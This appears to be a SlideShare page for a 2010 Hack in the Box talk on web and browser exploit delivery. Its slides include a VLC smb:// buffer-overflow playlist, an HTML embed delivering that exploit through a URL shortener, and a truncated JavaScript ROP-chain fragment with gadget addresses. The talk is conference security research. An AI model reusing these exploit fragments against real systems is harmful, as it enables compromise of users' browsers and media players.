• Save
W.E.B. 2010 - Web, Exploits, Browsers
Upcoming SlideShare
Loading in...5
×
 

W.E.B. 2010 - Web, Exploits, Browsers

on

  • 1,266 views

My talk at Hack in the Box 2010 - Kuala Lumpur ...

My talk at Hack in the Box 2010 - Kuala Lumpur

It has been a decade since I started talking about computer security. 10 years have witnessed a change in threat landscapes, attack targets, exploits, techniques and damage. Two eco-systems are slowly and surely converging into one. On one hand, we have the application layer. Much has been talked about it. There is a steady trickling flow of XSS, XSRF, SQL injection and the usual suspects. Some of them are under the guise of "Web 2.0", and some of them are as ancient as CGI attacks of 1999. On the other hand, we have the desktop. Dominating the desktop is the browser, with its horde of assistants. Exploitation in this space has accelerated in the last 3 years.

How will the threat landscape change with the advent of new technologies and services? New standards are emerging, and the darling child of the web is HTML 5. A closer look at standards reveals and awful mess. Are the standards mitigating any security concerns? More importantly, will browser vendors and web application developers really respect the standards? The browser wars taught us that "might is right". If everyone breaks the web, that becomes a new adopted standard. New technologies, coupled with popular online services make for some very interesting exploit delivery techniques.

This talk explores some innovative exploit delivery techniques that are born as a result of bloated standards and services designed without much thought towards security. We cover techniques where exploits can be delivered through URL shorteners and images. We take a look at some browser exploits. This talk ends with a discussion on exploit sophistication, ranging from highly polished and elegant techniques such as Return Oriented Programming to the downright crude and ugly techniques such as DLL Hijacking. How will we combine all this together? And will Anti-Virus still save us all?

Statistics

Views

Total Views
1,266
Views on SlideShare
1,266
Embed Views
0

Actions

Likes
0
Downloads
0
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • Sandboxing isn't the solution.

W.E.B. 2010 - Web, Exploits, Browsers W.E.B. 2010 - Web, Exploits, Browsers Presentation Transcript

  • W.E.B. 2010Web . Exploits . Browsers
    Saumil Shah
    Hack in the Box - Kuala Lumpur 2010
  • # who am i
    Saumil Shah, CEO Net-square
    LinkedIn: saumilshah
  • View slide
  • LOOK AT ALL THE COOL STUFF!!
    5
    View slide
  • 5
    33%
    MORE!
  • 5
    With JIT!Fights DEP, ASLR!
  • 5
    Worldwide coverage,
    Hides your tracks.
  • 5
    ...as never seen before!
  • 5
    GUARANTEED!!
    Fresh new bugs,
    Present on most computers
  • I can haz sandbox
    I Also Can!
  • IM IN UR BASE
    KILLING UR D00DZ
    Sploit Time!
  • See no EVAL
    CVE 2010-2883
    (0+1)day exploit
    Obfuscated Javascript decoded without using eval, document.write, etc.
  • Who you gonna call?
  • howstuffworks - Anti Virus
    YER NOT ON THE LIST! COME ON IN.
  • howstuffworks - Anti Virus
    These are not the sploitz you're looking for.
  • 0-day to the Face!
    "To get our new signature files you need a valid support plan."
  • ...and keep on patching
  • W3C
    "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
  • Application Delivery
    The Web
    at present
    Authentication
    Statefulness
    Data Typing
    Non-mutable
    HTTP
    HTML
    AJAX
    Flash
    Sandbox
    HTML5
    Anti-XSS
    WAF
    Silverlight
    Web sockets
    MIND THE GAP
  • Sploit Time!
  • Making the impossible possible
    smb:// mrl buffer overflow
  • VLC smb:// overflow - playlist
    <?xml version="1.0" encoding="UTF-8"?>
    <playlist version="1"
    xmlns="http://xspf.org/ns/0/"
    xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
    <title>Playlist</title>
    <trackList>
    <track>
    <location>
    smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
    </location>
    <extension
    application="http://www.videolan.org/vlc/playlist/0">
    <vlc:id>0</vlc:id>
    </extension>
    </track>
    </trackList>
    </playlist>
  • ...just add bit.ly
    smb:// mrl buffer overflow
  • 100% Pure Alphanum!
  • VLC smb overflow - HTMLized!!
    <embed type="application/x-vlc-plugin"
    width="320" height="200"
    target="http://tinyurl.com/ycctrzf"
    id="vlc" />
    I'm in ur browser....
    ...blowin up ur g00dz
    pwn
  • I'm an evil Javascript
    I'm an innocent image
  • function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval=""
    EET - Exploit Enabler Technology
    <canvas>
  • The Solution?
    HTML 8.0
    HTTP 2.0
    Browser Security Model
    Self Contained Apps
  • shoutz...
    L33tdawg, Amy, cbelinda
    KUL volunteerz
    NL crew
    Paul Vixie
  • kthxbai
    www.net-square.com
    secure . automate . innovate